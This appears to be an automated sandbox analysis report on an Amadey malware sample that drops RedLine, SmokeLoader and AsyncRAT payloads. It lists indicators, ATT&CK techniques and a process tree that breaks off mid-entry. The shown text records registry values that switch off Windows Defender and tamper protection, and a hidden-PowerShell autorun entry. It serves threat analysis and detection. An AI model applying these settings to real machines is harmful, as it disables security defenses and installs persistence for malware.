amadey | df76a0bf936b49438ca17b239993b38f8a12fdf498779bb40f407647e0dffc66

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	1Uu75Rm7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	1Uu75Rm7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	1Uu75Rm7.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	708C.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	708C.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	708C.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	1Uu75Rm7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	1Uu75Rm7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	708C.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	708C.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	708C.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	1Uu75Rm7.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 6 IoCs

resource	yara_rule
behavioral1/memory/4520-52-0x0000000000400000-0x000000000043E000-memory.dmp	family_redline
behavioral1/memory/5364-438-0x0000000001FC0000-0x000000000201A000-memory.dmp	family_redline
behavioral1/memory/5792-503-0x00000000002B0000-0x00000000002EE000-memory.dmp	family_redline
behavioral1/memory/5364-565-0x0000000000400000-0x000000000047E000-memory.dmp	family_redline
behavioral1/memory/4676-636-0x0000000000240000-0x000000000027E000-memory.dmp	family_redline
behavioral1/memory/2292-650-0x0000000000610000-0x000000000066A000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

description	pid	Process	procid_target
PID 3740 created 3236	3740	latestX.exe	37
PID 3740 created 3236	3740	latestX.exe	37
PID 3740 created 3236	3740	latestX.exe	37
PID 3740 created 3236	3740	latestX.exe	37

Async RAT payload 2 IoCs

rat

resource	yara_rule
behavioral1/memory/3152-717-0x00000000005A0000-0x00000000005B8000-memory.dmp	asyncrat
behavioral1/memory/3368-875-0x0000000000580000-0x0000000000598000-memory.dmp	asyncrat

Blocklisted process makes network request 28 IoCs

flow	pid	Process
203	1048	rundll32.exe
204	1048	rundll32.exe
205	1048	rundll32.exe
206	1048	rundll32.exe
207	1048	rundll32.exe
209	1048	rundll32.exe
210	1048	rundll32.exe
211	1048	rundll32.exe
212	1048	rundll32.exe
213	1048	rundll32.exe
214	1048	rundll32.exe
215	1048	rundll32.exe
216	1048	rundll32.exe
217	1048	rundll32.exe
218	1048	rundll32.exe
219	1048	rundll32.exe
220	1048	rundll32.exe
221	1048	rundll32.exe
222	1048	rundll32.exe
223	1048	rundll32.exe
224	1048	rundll32.exe
225	1048	rundll32.exe
226	1048	rundll32.exe
227	1048	rundll32.exe
228	1048	rundll32.exe
229	1048	rundll32.exe
230	1048	rundll32.exe
231	1048	rundll32.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	latestX.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-568313063-1441237985-1542345083-1000\Control Panel\International\Geo\Nation	calc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-568313063-1441237985-1542345083-1000\Control Panel\International\Geo\Nation	5Bn8IZ2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-568313063-1441237985-1542345083-1000\Control Panel\International\Geo\Nation	explothe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-568313063-1441237985-1542345083-1000\Control Panel\International\Geo\Nation	6OD3In9.exe
Key value queried	\REGISTRY\USER\S-1-5-21-568313063-1441237985-1542345083-1000\Control Panel\International\Geo\Nation	9964.exe
Key value queried	\REGISTRY\USER\S-1-5-21-568313063-1441237985-1542345083-1000\Control Panel\International\Geo\Nation	kos2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-568313063-1441237985-1542345083-1000\Control Panel\International\Geo\Nation	132E.exe
Key value queried	\REGISTRY\USER\S-1-5-21-568313063-1441237985-1542345083-1000\Control Panel\International\Geo\Nation	K.exe

Executes dropped EXE 45 IoCs

pid	Process
2024	qh7fB32.exe
3124	ro6dd05.exe
4100	Tn4eI28.exe
4928	md1YW48.exe
2156	1Uu75Rm7.exe
3360	2dT0842.exe
4904	3di69KZ.exe
2364	4EV380Bx.exe
4056	5Bn8IZ2.exe
2532	explothe.exe
3020	6OD3In9.exe
3076	66B4.exe
2064	vV7Xk4tL.exe
5544	688A.exe
3436	gc3sV5hO.exe
1676	Ao0jX7Xa.exe
5908	af0pT6aw.exe
4264	6AFD.exe
1352	1Xo82fC5.exe
5172	708C.exe
2404	731D.exe
5364	7744.exe
5792	2Kn148MN.exe
6140	explothe.exe
4268	9964.exe
4624	B71E.exe
3908	B7DB.exe
1336	BF2F.exe
5928	toolspub2.exe
4676	C6B1.exe
404	toolspub2.exe
2292	E91F.exe
3456	31839b57a4f11171d6abc8bbc4451ee4.exe
6048	kos2.exe
3152	132E.exe
3740	latestX.exe
3736	1DBE.exe
4596	set16.exe
2104	261B.exe
4456	K.exe
3800	is-65F7P.tmp
4644	MyBurn.exe
3368	calc.exe
5840	MyBurn.exe
1392	explothe.exe

Loads dropped DLL 5 IoCs

pid	Process
4432	rundll32.exe
1048	rundll32.exe
3800	is-65F7P.tmp
3800	is-65F7P.tmp
3800	is-65F7P.tmp

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000022dcd-68.dat	upx
behavioral1/memory/3020-71-0x0000000000400000-0x000000000041E000-memory.dmp	upx
behavioral1/files/0x0007000000022dcd-69.dat	upx
behavioral1/memory/3020-85-0x0000000000400000-0x000000000041E000-memory.dmp	upx
behavioral1/files/0x0007000000022e4e-341.dat	upx

Windows security modification 2 TTPs 4 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features	1Uu75Rm7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	1Uu75Rm7.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	708C.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	708C.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 11 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""	md1YW48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	66B4.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-568313063-1441237985-1542345083-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\B7DB.exe'\""	B7DB.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	gc3sV5hO.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""	Ao0jX7Xa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\""	af0pT6aw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	df76a0bf936b49438ca17b239993b38f8a12fdf498779bb40f407647e0dffc66.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	qh7fB32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	ro6dd05.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	Tn4eI28.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	vV7Xk4tL.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 4904 set thread context of 2108	4904	3di69KZ.exe	98
PID 2364 set thread context of 4520	2364	4EV380Bx.exe	101
PID 1352 set thread context of 1548	1352	1Xo82fC5.exe	172
PID 5928 set thread context of 404	5928	toolspub2.exe	187

Drops file in Program Files directory 12 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\MyBurn\is-I8M5B.tmp	is-65F7P.tmp
File created	C:\Program Files (x86)\MyBurn\is-N5HB5.tmp	is-65F7P.tmp
File created	C:\Program Files (x86)\MyBurn\is-KHFK6.tmp	is-65F7P.tmp
File created	C:\Program Files (x86)\MyBurn\is-8GURM.tmp	is-65F7P.tmp
File created	C:\Program Files (x86)\MyBurn\Sounds\is-83A4E.tmp	is-65F7P.tmp
File created	C:\Program Files (x86)\MyBurn\Sounds\is-6J60A.tmp	is-65F7P.tmp
File opened for modification	C:\Program Files (x86)\MyBurn\unins000.dat	is-65F7P.tmp
File opened for modification	C:\Program Files (x86)\MyBurn\MyBurn.exe	is-65F7P.tmp
File created	C:\Program Files (x86)\MyBurn\unins000.dat	is-65F7P.tmp
File created	C:\Program Files (x86)\MyBurn\is-MQQ54.tmp	is-65F7P.tmp
File created	C:\Program Files (x86)\MyBurn\is-NSBTJ.tmp	is-65F7P.tmp
File created	C:\Program Files (x86)\MyBurn\is-PVASV.tmp	is-65F7P.tmp

Launches sc.exe 8 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2892	sc.exe
5988	sc.exe
5220	sc.exe
5780	sc.exe
2028	sc.exe
5208	sc.exe
1112	sc.exe
5976	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
4416	1548	WerFault.exe	172
3008	1548	WerFault.exe	172
4676	3368	WerFault.exe	212

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
3000	schtasks.exe
2012	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3124	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2156	1Uu75Rm7.exe
2156	1Uu75Rm7.exe
2156	1Uu75Rm7.exe
2156	1Uu75Rm7.exe
2108	AppLaunch.exe
2108	AppLaunch.exe
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3236	Explorer.EXE

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
2108	AppLaunch.exe
404	toolspub2.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs

pid	Process
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3236	Explorer.EXE
Token: SeCreatePagefilePrivilege	3236	Explorer.EXE
Token: SeShutdownPrivilege	3236	Explorer.EXE
Token: SeCreatePagefilePrivilege	3236	Explorer.EXE
Token: SeShutdownPrivilege	3236	Explorer.EXE
Token: SeCreatePagefilePrivilege	3236	Explorer.EXE
Token: SeShutdownPrivilege	3236	Explorer.EXE
Token: SeCreatePagefilePrivilege	3236	Explorer.EXE
Token: SeShutdownPrivilege	3236	Explorer.EXE
Token: SeCreatePagefilePrivilege	3236	Explorer.EXE
Token: SeShutdownPrivilege	3236	Explorer.EXE
Token: SeCreatePagefilePrivilege	3236	Explorer.EXE
Token: SeShutdownPrivilege	3236	Explorer.EXE
Token: SeCreatePagefilePrivilege	3236	Explorer.EXE
Token: SeShutdownPrivilege	3236	Explorer.EXE
Token: SeCreatePagefilePrivilege	3236	Explorer.EXE
Token: SeShutdownPrivilege	3236	Explorer.EXE
Token: SeCreatePagefilePrivilege	3236	Explorer.EXE
Token: SeShutdownPrivilege	3236	Explorer.EXE
Token: SeCreatePagefilePrivilege	3236	Explorer.EXE
Token: SeShutdownPrivilege	3236	Explorer.EXE
Token: SeCreatePagefilePrivilege	3236	Explorer.EXE
Token: SeShutdownPrivilege	3236	Explorer.EXE
Token: SeCreatePagefilePrivilege	3236	Explorer.EXE
Token: SeShutdownPrivilege	3236	Explorer.EXE
Token: SeCreatePagefilePrivilege	3236	Explorer.EXE
Token: SeShutdownPrivilege	3236	Explorer.EXE
Token: SeCreatePagefilePrivilege	3236	Explorer.EXE
Token: SeShutdownPrivilege	3236	Explorer.EXE
Token: SeCreatePagefilePrivilege	3236	Explorer.EXE
Token: SeShutdownPrivilege	3236	Explorer.EXE
Token: SeCreatePagefilePrivilege	3236	Explorer.EXE
Token: SeDebugPrivilege	5172	708C.exe
Token: SeShutdownPrivilege	3236	Explorer.EXE
Token: SeCreatePagefilePrivilege	3236	Explorer.EXE
Token: SeShutdownPrivilege	3236	Explorer.EXE
Token: SeCreatePagefilePrivilege	3236	Explorer.EXE
Token: SeShutdownPrivilege	3236	Explorer.EXE
Token: SeCreatePagefilePrivilege	3236	Explorer.EXE
Token: SeDebugPrivilege	5364	7744.exe
Token: SeShutdownPrivilege	3236	Explorer.EXE
Token: SeCreatePagefilePrivilege	3236	Explorer.EXE
Token: SeShutdownPrivilege	3236	Explorer.EXE
Token: SeCreatePagefilePrivilege	3236	Explorer.EXE
Token: SeShutdownPrivilege	3236	Explorer.EXE
Token: SeCreatePagefilePrivilege	3236	Explorer.EXE
Token: SeShutdownPrivilege	3236	Explorer.EXE
Token: SeCreatePagefilePrivilege	3236	Explorer.EXE
Token: SeShutdownPrivilege	3236	Explorer.EXE
Token: SeCreatePagefilePrivilege	3236	Explorer.EXE
Token: SeDebugPrivilege	4624	B71E.exe
Token: SeShutdownPrivilege	3236	Explorer.EXE
Token: SeCreatePagefilePrivilege	3236	Explorer.EXE
Token: SeShutdownPrivilege	3236	Explorer.EXE
Token: SeCreatePagefilePrivilege	3236	Explorer.EXE
Token: SeShutdownPrivilege	3236	Explorer.EXE
Token: SeCreatePagefilePrivilege	3236	Explorer.EXE
Token: SeShutdownPrivilege	3236	Explorer.EXE
Token: SeCreatePagefilePrivilege	3236	Explorer.EXE
Token: SeShutdownPrivilege	3236	Explorer.EXE
Token: SeCreatePagefilePrivilege	3236	Explorer.EXE
Token: SeShutdownPrivilege	3236	Explorer.EXE
Token: SeCreatePagefilePrivilege	3236	Explorer.EXE
Token: SeShutdownPrivilege	3236	Explorer.EXE

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe
1160	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3368	calc.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3236	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3312 wrote to memory of 2024	3312	df76a0bf936b49438ca17b239993b38f8a12fdf498779bb40f407647e0dffc66.exe	86
PID 3312 wrote to memory of 2024	3312	df76a0bf936b49438ca17b239993b38f8a12fdf498779bb40f407647e0dffc66.exe	86
PID 3312 wrote to memory of 2024	3312	df76a0bf936b49438ca17b239993b38f8a12fdf498779bb40f407647e0dffc66.exe	86
PID 2024 wrote to memory of 3124	2024	qh7fB32.exe	87
PID 2024 wrote to memory of 3124	2024	qh7fB32.exe	87
PID 2024 wrote to memory of 3124	2024	qh7fB32.exe	87
PID 3124 wrote to memory of 4100	3124	ro6dd05.exe	88
PID 3124 wrote to memory of 4100	3124	ro6dd05.exe	88
PID 3124 wrote to memory of 4100	3124	ro6dd05.exe	88
PID 4100 wrote to memory of 4928	4100	Tn4eI28.exe	89
PID 4100 wrote to memory of 4928	4100	Tn4eI28.exe	89
PID 4100 wrote to memory of 4928	4100	Tn4eI28.exe	89
PID 4928 wrote to memory of 2156	4928	md1YW48.exe	90
PID 4928 wrote to memory of 2156	4928	md1YW48.exe	90
PID 4116 wrote to memory of 4080	4116	cmd.exe	95
PID 4116 wrote to memory of 4080	4116	cmd.exe	95
PID 4928 wrote to memory of 3360	4928	md1YW48.exe	96
PID 4928 wrote to memory of 3360	4928	md1YW48.exe	96
PID 4928 wrote to memory of 3360	4928	md1YW48.exe	96
PID 4100 wrote to memory of 4904	4100	Tn4eI28.exe	97
PID 4100 wrote to memory of 4904	4100	Tn4eI28.exe	97
PID 4100 wrote to memory of 4904	4100	Tn4eI28.exe	97
PID 4904 wrote to memory of 2108	4904	3di69KZ.exe	98
PID 4904 wrote to memory of 2108	4904	3di69KZ.exe	98
PID 4904 wrote to memory of 2108	4904	3di69KZ.exe	98
PID 4904 wrote to memory of 2108	4904	3di69KZ.exe	98
PID 4904 wrote to memory of 2108	4904	3di69KZ.exe	98
PID 4904 wrote to memory of 2108	4904	3di69KZ.exe	98
PID 3124 wrote to memory of 2364	3124	ro6dd05.exe	99
PID 3124 wrote to memory of 2364	3124	ro6dd05.exe	99
PID 3124 wrote to memory of 2364	3124	ro6dd05.exe	99
PID 2364 wrote to memory of 4520	2364	4EV380Bx.exe	101
PID 2364 wrote to memory of 4520	2364	4EV380Bx.exe	101
PID 2364 wrote to memory of 4520	2364	4EV380Bx.exe	101
PID 2364 wrote to memory of 4520	2364	4EV380Bx.exe	101
PID 2364 wrote to memory of 4520	2364	4EV380Bx.exe	101
PID 2364 wrote to memory of 4520	2364	4EV380Bx.exe	101
PID 2364 wrote to memory of 4520	2364	4EV380Bx.exe	101
PID 2364 wrote to memory of 4520	2364	4EV380Bx.exe	101
PID 2024 wrote to memory of 4056	2024	qh7fB32.exe	102
PID 2024 wrote to memory of 4056	2024	qh7fB32.exe	102
PID 2024 wrote to memory of 4056	2024	qh7fB32.exe	102
PID 4056 wrote to memory of 2532	4056	5Bn8IZ2.exe	103
PID 4056 wrote to memory of 2532	4056	5Bn8IZ2.exe	103
PID 4056 wrote to memory of 2532	4056	5Bn8IZ2.exe	103
PID 3312 wrote to memory of 3020	3312	df76a0bf936b49438ca17b239993b38f8a12fdf498779bb40f407647e0dffc66.exe	104
PID 3312 wrote to memory of 3020	3312	df76a0bf936b49438ca17b239993b38f8a12fdf498779bb40f407647e0dffc66.exe	104
PID 3312 wrote to memory of 3020	3312	df76a0bf936b49438ca17b239993b38f8a12fdf498779bb40f407647e0dffc66.exe	104
PID 2532 wrote to memory of 3000	2532	explothe.exe	105
PID 2532 wrote to memory of 3000	2532	explothe.exe	105
PID 2532 wrote to memory of 3000	2532	explothe.exe	105
PID 3020 wrote to memory of 4060	3020	6OD3In9.exe	108
PID 3020 wrote to memory of 4060	3020	6OD3In9.exe	108
PID 2532 wrote to memory of 3800	2532	explothe.exe	106
PID 2532 wrote to memory of 3800	2532	explothe.exe	106
PID 2532 wrote to memory of 3800	2532	explothe.exe	106
PID 3800 wrote to memory of 384	3800	cmd.exe	137
PID 3800 wrote to memory of 384	3800	cmd.exe	137
PID 3800 wrote to memory of 384	3800	cmd.exe	137
PID 3800 wrote to memory of 4484	3800	cmd.exe	113
PID 3800 wrote to memory of 4484	3800	cmd.exe	113
PID 3800 wrote to memory of 4484	3800	cmd.exe	113
PID 3800 wrote to memory of 4888	3800	cmd.exe	114
PID 3800 wrote to memory of 4888	3800	cmd.exe	114

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\df76a0bf936b49438ca17b239993b38f8a12fdf498779bb40f407647e0dffc66.exe
"C:\Users\Admin\AppData\Local\Temp\df76a0bf936b49438ca17b239993b38f8a12fdf498779bb40f407647e0dffc66.exe"
1⤵
- DcRat
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3312
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\qh7fB32.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\qh7fB32.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:2024
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro6dd05.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro6dd05.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:3124
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tn4eI28.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tn4eI28.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:4100
    - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\md1YW48.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\md1YW48.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:4928
      - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Uu75Rm7.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Uu75Rm7.exe
        6⤵
        Modifies Windows Defender Real-time Protection settings
        Executes dropped EXE
        Windows security modification
        Suspicious behavior: EnumeratesProcesses
        
        PID:2156
      - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2dT0842.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2dT0842.exe
        6⤵
        Executes dropped EXE
        
        PID:3360
    - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3di69KZ.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3di69KZ.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:4904
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
